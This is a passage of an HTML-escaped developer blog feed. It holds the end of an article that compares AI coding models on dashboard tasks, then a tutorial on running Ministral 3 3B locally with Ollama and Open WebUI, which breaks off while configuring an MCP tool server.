&lt;strong&gt;Input:&lt;/strong&gt; ~79k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache Reads:&lt;/strong&gt; ~536k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~10.7k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Savings:&lt;/strong&gt; ~87% of input tokens served from cache&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzef5ujwyq1f5o19e7dg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzef5ujwyq1f5o19e7dg.png" alt="gemini 3 pro token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Overall, Gemini 3 lands in a very clear third place here. It works, the UI looks fine, and nothing is completely broken, but compared to the depth, completeness, and polish of GPT-5.2 High and Claude Opus 4.5, it feels behind.&lt;/p&gt;
&lt;h3&gt;
  
  
  Test 2: Tool Usage Analytics + Insights Dashboard
&lt;/h3&gt;

&lt;p&gt;This test is a step up from the action palette.&lt;/p&gt;

&lt;p&gt;You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/637b453d206554b78eabd38fa159084d" rel="noopener noreferrer"&gt;Prompt&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  GPT-5.2-Codex (high)
&lt;/h4&gt;

&lt;p&gt;GPT-5.2 absolutely nailed this one.&lt;/p&gt;

&lt;p&gt;The final result turned out amazing. Tool usage tracking works exactly as expected, data persists correctly, and the dashboard feels like a real product feature. Most used tools, recent usage, filters, everything just works.&lt;/p&gt;

&lt;p&gt;One really nice touch is that it also wired analytics-related actions into the Action Palette from Test 1.&lt;/p&gt;

&lt;p&gt;It did take a bit longer than the first test, around 26 minutes, but again, that’s the trade-off with high reasoning. You can tell the model spent time thinking through data modeling, reuse, and avoiding duplicated logic. Totally worth it here.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/8RUeWl_09nY"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/b89de0278911b289d941b8129df69d66" rel="noopener noreferrer"&gt;GPT-5.2 High Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$1.1–1.2&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~26 minutes (API time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; Large multi-file update, cleanly structured&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total:&lt;/strong&gt; ~236k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~162k (+ heavy cached context)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~75k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning tokens:&lt;/strong&gt; ~57k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;GPT-5.2 High continues to be slow but extremely powerful, and for a task like this, that’s a very good trade.&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Opus 4.5
&lt;/h4&gt;

&lt;p&gt;Claude Opus 4.5 did great here as well.&lt;/p&gt;

&lt;p&gt;The final implementation works end to end, and honestly, from a pure UI and feature standpoint, it’s hard to tell the difference between this and GPT-5.2 High. The dashboard looks clean, the data makes sense, and the filters work as expected.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/-npHfTxicF4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/934c3841101c073b50a5dad18746d78d" rel="noopener noreferrer"&gt;Claude Opus 4.5 Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; $1.78&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~8 minutes (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +1,279 lines, -17 lines&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  Gemini 3 Pro
&lt;/h4&gt;

&lt;p&gt;Gemini 3 Pro gets the job done, but it clearly takes a more minimal approach compared to GPT-5.2 High and Claude Opus 4.5.&lt;/p&gt;

&lt;p&gt;That said, the overall experience feels very bare minimum. The UI is functional but plain, and the dashboard lacks the polish and depth you get from the other two models.&lt;/p&gt;

&lt;p&gt;Also, it didn't quite add the button to view the analytics right in the action palette, similar to the other two models.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/JuQjYnY-XGE"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/cd2ceb9d4a6a1f53abd274cd1efc89ba" rel="noopener noreferrer"&gt;Gemini 3 Pro Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Low, with heavy cache utilization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~5 minutes (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +351 lines, -3 lines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~67k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~7.1k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Savings:&lt;/strong&gt; ~85%+ input tokens served from cache&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Overall, Gemini 3 Pro remains efficient and reliable, but in a comparison like this, efficiency alone is not enough. 🤷‍♂️&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;At least from this test, I can conclude that the models are now pretty much able to one-shot a decent complex work, at least from what I tested.&lt;/p&gt;

&lt;p&gt;Still, there have been times when the models mess up so badly that if I were to go ahead and fix the problems one by one, it would take me nearly the same time as building it from scratch.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxv5kpey20fduyyqrh3e.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxv5kpey20fduyyqrh3e.gif" alt="dog sideeye gif"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If I compare the results across models, Opus 4.5 definitely takes the crown. But I still don’t think we’re anywhere close to relying on it for real, big production projects. The recent improvements are honestly insane, but the results still don’t fully back them up.&lt;/p&gt;

&lt;p&gt;For now, I think these models are great for refactoring, planning, and helping you move faster. But if you solely rely on their generated code, the codebase just won’t hold up long term.&lt;/p&gt;

&lt;p&gt;I don't see any of these recent models as “use it and ship it” for "production," in a project with millions of lines of code, at least not in the way people hype it up.&lt;/p&gt;

&lt;p&gt;Let me know your thoughts in the comments.&lt;/p&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>webdev</category>
      <category>programming</category>
      <category>javascript</category>
      <category>ai</category>
    </item>
    <item>
      <title>Ministral 3 3B Local Setup Guide with MCP Tool Calling 🔥</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Wed, 24 Dec 2025 16:26:00 +0000</pubDate>
      <link>https://forem.com/composiodev/ministral-3-3b-local-setup-guide-with-mcp-tool-calling-icm</link>
      <guid>https://forem.com/composiodev/ministral-3-3b-local-setup-guide-with-mcp-tool-calling-icm</guid>
      <description>&lt;p&gt;Everyone’s talking about Ministral 3 3B, so I wanted to see what the hype is about. 🤨&lt;/p&gt;

&lt;p&gt;Let's test it properly. We’ll start with the fun part and run it directly in the browser using WebGPU, fully local.&lt;/p&gt;

&lt;p&gt;Then we’ll switch to the practical setup and run a quantized version with Ollama, plug it into Open WebUI, and test real tool calling. First with small local Python tools, then with remote MCP tools via Composio.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fezz2omw7gxn6etpvh9fj.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fezz2omw7gxn6etpvh9fj.gif" alt="Shocked GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will cover a few specs and then move on to practical tests, so let's jump in.&lt;/p&gt;




&lt;h2&gt;
  
  
  What’s Covered?
&lt;/h2&gt;

&lt;p&gt;In this hands-on guide, you’ll learn about the Ministral 3 3B model, how to run it locally, and how to get it to perform &lt;strong&gt;real tool calls&lt;/strong&gt; using Open WebUI, first with local tools and then with &lt;strong&gt;remote MCP tools via Composio&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you will learn: ✨&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What makes Ministral 3 3B special&lt;/li&gt;
&lt;li&gt;How to run the model locally using Ollama (including pulling a quantized variant)&lt;/li&gt;
&lt;li&gt;How to launch Open WebUI using Docker and connect it to Ollama&lt;/li&gt;
&lt;li&gt;How to add and test local Python tools inside Open WebUI&lt;/li&gt;
&lt;li&gt;How to work with remotely hosted MCP tools in Open WebUI&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; This isn’t a benchmark post. The idea is to show a practical setup for running a small local model with real tools, then extending it with remote MCP servers.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  What's so Special?
&lt;/h2&gt;

&lt;p&gt;Ministral 3 3B is the smallest and most efficient model in the Ministral 3 family. Mistral 3 includes three state-of-the-art small dense models: 14B, 8B, and 3B, along with Mistral Large 3, which is the most capable model to date from Mistral. All models in this family are open source under the Apache 2.0 license, which means you can fine-tune and use them commercially for free.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb1w71afsm49cogmvamz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb1w71afsm49cogmvamz.png" alt="Ministral 3 3B base benchmark"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But the topic of our talk is the &lt;strong&gt;Ministral 3 3B model&lt;/strong&gt;. At such a small size, it comes with function calling, structured output, vision capabilities, and most importantly, it is one of the first multimodal models capable of running &lt;strong&gt;completely locally&lt;/strong&gt; in the browser with WebGPU support.&lt;/p&gt;

&lt;p&gt;As Mistral puts it, this model is both compact and powerful. It is specially designed for edge deployment, offering insanely high speed and the ability to run completely locally even on fairly old or low-end hardware.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1b5y1mbj6yq1o1y2jgry.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1b5y1mbj6yq1o1y2jgry.png" alt="Ministral 3 3B claim"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here is the model’s token context window and pricing.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Token Context Window:&lt;/strong&gt; It comes with a 256K token context window, which is impressive for a model of this size. For reference, the recent Claude Opus 4.5 model, which is built specifically for agentic coding, comes with a 200K token context window.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pricing:&lt;/strong&gt; Because it is open source, you can access it for free by running it locally. If you use it through the Mistral playground, pricing starts at $0.1 per million input tokens and $0.1 per million output tokens, which is almost negligible. It honestly feels like the pricing is there just for formality.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Besides its decent context window and fully open-source nature, these are the major features of Ministral 3 3B.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Vision:&lt;/strong&gt; Enables the model to analyze images and provide insights based on visual content, in addition to text.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multilingual:&lt;/strong&gt; Supports dozens of languages, including English, French, Spanish, German, and more.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Agentic:&lt;/strong&gt; Offers strong agentic capabilities with native function calling and JSON output, which we will cover shortly.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Local:&lt;/strong&gt; Runs completely locally in your browser with WebGPU support.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here is a small demo of the model running directly in the browser:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/p8i06eO5rOs"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;To actually get a feel for running a model locally in the browser, head over to this Hugging Face Space: &lt;a href="https://huggingface.co/spaces/mistralai/Ministral_3B_WebGPU" rel="noopener noreferrer"&gt;mistralai/Ministral_3B_WebGPU&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; For most users, this will work out of the box, but some may encounter an error if WebGPU is not enabled or supported in their browser. Make sure WebGPU is enabled based on the browser you are using.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;When you load it, the model files, roughly 3GB, are downloaded into your browser cache, and the model runs 100 percent locally with WebGPU acceleration. It is powered by &lt;a href="https://huggingface.co/docs/transformers.js/en/index" rel="noopener noreferrer"&gt;Transformers.js&lt;/a&gt;, and all prompts are handled directly in the browser. No remote requests are made. Everything happens locally.&lt;/p&gt;

&lt;p&gt;How cool is that? You can run a capable multimodal model entirely inside your browser, with no server involved.&lt;/p&gt;




&lt;h2&gt;
  
  
  Running Ministral 3 3B Locally
&lt;/h2&gt;

&lt;p&gt;In the above example, you see how the model does such an amazing job with vision capabilities (live video classification). Now let's see how good this model is at making tool calls. We will test it by running the model locally on our system.&lt;/p&gt;

&lt;p&gt;For this, there are generally two recommended approaches:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;vLLM&lt;/strong&gt;: Easy, fast, and cheap LLM serving for everyone.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Good old Ollama&lt;/strong&gt;: Chat &amp;amp; build with open models.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can go with either option, and generally speaking, the vLLM approach is a lot easier to get started with, and that's what I'd suggest, but...&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6szsqilyrylxfqp4fqby.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6szsqilyrylxfqp4fqby.png" alt="CUDA out of memory"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I kept hitting a CUDA out-of-memory error, so I went with Ollama with the quantized model. I have had a great experience with Ollama so far. The model will be good enough for our use case demo.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Install Ollama and Docker
&lt;/h3&gt;

&lt;p&gt;If you don't have Ollama installed already, install it on your system by following the documentation here: &lt;a href="https://ollama.com/download" rel="noopener noreferrer"&gt;Ollama Installation Guide&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;It's not compulsory, but we will use the OpenWebUI through the Docker container, so if you plan to follow along, make sure you have Docker installed.&lt;/p&gt;

&lt;p&gt;You can find the Docker installation guide here: &lt;a href="https://docs.docker.com/engine/install/" rel="noopener noreferrer"&gt;Docker Installation&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Download Ministral 3 3B Model and Start Ollama
&lt;/h3&gt;

&lt;p&gt;Now that you have Ollama installed and Docker running, let's download the &lt;a href="https://ollama.com/library/ministral-3:3b" rel="noopener noreferrer"&gt;Ministral 3 3B model&lt;/a&gt; and start Ollama.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama pull ministral-3:3b
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;CAUTION&lt;/strong&gt;: If you don't have sufficient VRAM (Virtual RAM) and decent specs on your system, your system might catch fire when running the model. 🫠&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If so, go with the quantized model instead as I did.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama pull ministral-3:3b-instruct-2512-q4_K_M
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, start the Ollama server with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama serve
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once the model is downloaded and the server is running, you can quickly test it in the terminal itself.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama run ministral-3:3b-instruct-2512-q4_K_M &lt;span class="s2"&gt;"Which came first, the chicken or the egg?"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you get a response, you are good to go.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Run Ollama WebUI
&lt;/h3&gt;

&lt;p&gt;To just talk with the model, the CLI chat with &lt;code&gt;ollama run&lt;/code&gt; works perfectly, but we need to add some custom tools to our model.&lt;/p&gt;

&lt;p&gt;For that, the easiest way is through the Ollama WebUI.&lt;/p&gt;

&lt;p&gt;Download and run the Ollama WebUI with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--network&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;host &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;OLLAMA_BASE_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;http://127.0.0.1:11434 &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;-v&lt;/span&gt; open-webui:/app/backend/data &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;--name&lt;/span&gt; open-webui &lt;span class="nt"&gt;--restart&lt;/span&gt; always &lt;span class="se"&gt;\&lt;/span&gt;
            ghcr.io/open-webui/open-webui:main
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That command starts &lt;strong&gt;Open WebUI&lt;/strong&gt; in Docker and sets it up to talk with the local Ollama server we just started with the &lt;code&gt;ollama serve&lt;/code&gt; command.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;docker run -d&lt;/code&gt; runs the container in the background (detached).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-network=host&lt;/code&gt; puts the container on the host network, so it can reach services on your machine using &lt;code&gt;127.0.0.1&lt;/code&gt; (localhost).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;e OLLAMA_BASE_URL=http://127.0.0.1:11434&lt;/code&gt; tells Open WebUI where your Ollama server is.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;v open-webui:/app/backend/data&lt;/code&gt; creates a persistent Docker volume so your Open WebUI chat history persists.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-name open-webui&lt;/code&gt; names the container.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-restart always&lt;/code&gt; makes it auto-start again after reboots or crashes.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ghcr.io/open-webui/open-webui:main&lt;/code&gt; is the image being run (the &lt;code&gt;main&lt;/code&gt; tag).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To see if it all worked well, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker ps
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see a container with the name &lt;code&gt;open-webui&lt;/code&gt; and the status &lt;code&gt;Up&lt;/code&gt;, you are good to go, and you can now safely visit: &lt;code&gt;http://localhost:8080&lt;/code&gt; to view the WebUI.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Add Custom Tools for Function Calling
&lt;/h3&gt;

&lt;p&gt;Once you're in, you should see the new model &lt;code&gt;ministral-3:3b-instruct-2512&lt;/code&gt; in the list of models. Now, let's add our custom tools.&lt;/p&gt;

&lt;p&gt;First, let's test it with local tools, which are smaller Python functions that the model can call.&lt;/p&gt;

&lt;p&gt;Head over to the Workspace tab in the left sidebar, and in the Tools section, click on the "+ New Tool" button, and paste the following code: &lt;a href="https://gist.github.com/shricodev/422b04f2eac96c77a3210adaea1a1a9c" rel="noopener noreferrer"&gt;Local Tools&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fni0ws3732a4uhxfs0ifi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fni0ws3732a4uhxfs0ifi.png" alt="Add tool in ollama webui"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, in a new chat, try saying something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"What's 6 + 7?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The model should use our added tool to answer the question.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F49nubkgszima56fnwxaf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F49nubkgszima56fnwxaf.png" alt="Ministral 3 3B returning response after a tool call"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: Add Remote MCP Tools for Function Calling
&lt;/h3&gt;

&lt;p&gt;But that's not fun. 😪 We want to use tools that are hosted remotely, right?&lt;/p&gt;

&lt;p&gt;For that, we can use Composio MCP, which is well-maintained and supports over 500 apps, so why not?&lt;/p&gt;

&lt;p&gt;Now we need the MCP URL... For that, head over to &lt;a href="https://docs.composio.dev/rest-api/tool-router/post-labs-tool-router-session?explorer=true" rel="noopener noreferrer"&gt;Composio API Reference&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Add your API key and the user ID, and make a request. You should get the MCP URL returned to you in a JSON format. Keep a note of the URL.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4x85415gpuhuiljg2dcj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4x85415gpuhuiljg2dcj.png" alt="Composio MCP URL"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 But is this the only way? &lt;strong&gt;No&lt;/strong&gt;, this is just a quick way I use to get the URL back without any coding. You can get it using &lt;a href="https://docs.composio.dev/tool-router/quickstart#using-tool-router-mcp" rel="noopener noreferrer"&gt;Python/TS code&lt;/a&gt; as well.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Now, you're almost there. All you need to do is add a new MCP server with this URL.&lt;/p&gt;

&lt;p&gt;Click on your profile icon at the top, under &lt;strong&gt;Admin Panel&lt;/strong&gt;, click on the &lt;strong&gt;Settings&lt;/strong&gt; tab, and under &lt;strong&gt;External Tools&lt;/strong&gt;, click on the "+" button to add external servers.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7wqsrcypb0tfpjuts05n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7wqsrcypb0tfpjuts05n.png" alt="Ollama webui new tool"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the dialog box, make sure that you switch to &lt;strong&gt;MCP Streamable HTTP&lt;/strong&gt; from &lt;strong&gt;OpenAPI&lt;/strong&gt;, and fill in the URL and give it a nice name and description.&lt;/p&gt;

&lt;p&gt;For Authentication, check &lt;strong&gt;None&lt;/strong&gt;; we will handle authentication with the additional header "x-api-key". In the Headers input, add the following JSON:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
